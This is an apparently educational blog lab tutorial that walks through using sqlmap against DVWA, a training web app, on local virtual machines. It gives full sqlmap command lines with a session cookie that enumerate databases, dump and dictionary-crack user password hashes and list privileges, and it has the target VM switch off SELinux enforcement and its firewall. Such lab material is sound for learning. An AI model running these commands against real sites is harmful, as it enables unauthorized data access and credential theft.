Thứ Hai, 18 tháng 11, 2013

Hướng Dẫn Thực Hành - Automate SQL Injection with SqlMap (DVWA): Lesson 7



Section 0. Background Information
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
        Tài liệu dùng cho mục đích học tập.
Section 1. Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

Section 2. Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine
  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

Section 3. Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal
  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>
  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

Section 4. Temporarily Disable SELINUX and Firewall
  1. Start a Terminal Console
    • Instructions:
      1. sestatus
      2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
      3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
    • Notes:
      • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
  2. Place selinux in permissive mode
    • Instructions:
      1. echo 0 > /selinux/enforce
        • Placing a "0" in the enforce file, puts selinux in permissive mode.
      2. sestatus
        • Notice that "Current mode:" changed to permissive.
  3. Disable Firewall
    • Instructions:
      1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
      2. service iptables stop
        • This command disables the firewall.
Section 5. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 6. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 7. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 8. Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox
  2. Login to DVWA
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      3. Login: admin
      4. Password: password
      5. Click on Login

Section 9. Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit
Section 10. Obtain PHP Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select "SQL Injection" from the left navigation menu.
  2. Select Tamper Data
    • Instructions:
      1. Tools --> Tamper Data
  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper
  4. Basic Injection
    • Instructions:
      1. Input "1" into the text box.
      2. Click Submit.
    • Note:
      • The goal here is see the GET request being made to the CGI program behind the scenes.
      • Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.
  5. Tamper with request?
    • Instructions:
      1. Make sure the Continue Tampering? textbox is unchecked.
      2. Then Click Submit
  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy
  7. Open Notepad
    • Instructions:
      1. Applications --> Wine --> Programs --> Accessories --> Notepad
  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit --> Paste
  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy
  10. Pasting the Cookie Information
    • Instructions:
      1. Edit --> Paste
    • Notes:
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

Section 11. Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py
  2. Obtain Database User For DVWA
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • --current-db, Retrieve DBMS current database
        • --current-user, Retrieve DBMS current user
  3. Do you want to keep testing?
    • Instructions:
      1. keep testing? y
      2. skip payloads? y
  4. Viewing Results
    • Instructions:
      1. For the web application DVWA, the database name is "dvwa" and the programs that communicate with the database is "root@localhost";


Section 12. Using SqlMap to Obtain Database Management Username and Password
  • NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
  1. Obtain Database Management Username and Password
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -string, Provide a string set that is always present after valid or invalid query.
        • --users, list database management system users
        • --password, list database management password for system users.
  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Use Dictionary Attack? Y
      2. Dictionary Location? <Press Enter>
    • Notes:
      1. Notice the password for username db_hacker was cracked.
  3. Obtain db_hacker Database Privileges
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -U, Specify database management user
        • --privileges, list database management system user's privileges
  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user "db_hacker" has administrative privileges
      2. Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.


Section 13. Obtain a list of all Databases
  1. Obtain a list of all databases
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --dbs, List database management system's databases.
  2. Review Results: Obtain a list of all databases
    • Note:
      1. Notice that sqlmap supplies a list of available databases.

Section 14. Obtain "dvwa" tables and contents
  1. Obtain "dvwa" tables and contents
    • Note:
      1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • --tables, List Database Tables
  2. Viewing "dvwa" tables and content results
    • Note:
      1. Notice sqlmap listed two tables: guestbook and users.
  3. Obtain columns for table dvwa.users
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • --columns, List the Columns of the Database Table.
  4. Viewing Results: columns for table dvwa.users
    • Note:
      1. Notice that there are both a user and password columns in the dvwa.users table.
  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, List user and password columns
        • --dump, Dump table contents
  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What's the dictionary location? <Press Enter>
      4. Use common password suffixes? y
  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes:
      1. Notice how sqlmap nicely displays passwords for each user.

Section 15. Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Email 2 CSIRT247@Gmail.Com

Không có nhận xét nào:

Đăng nhận xét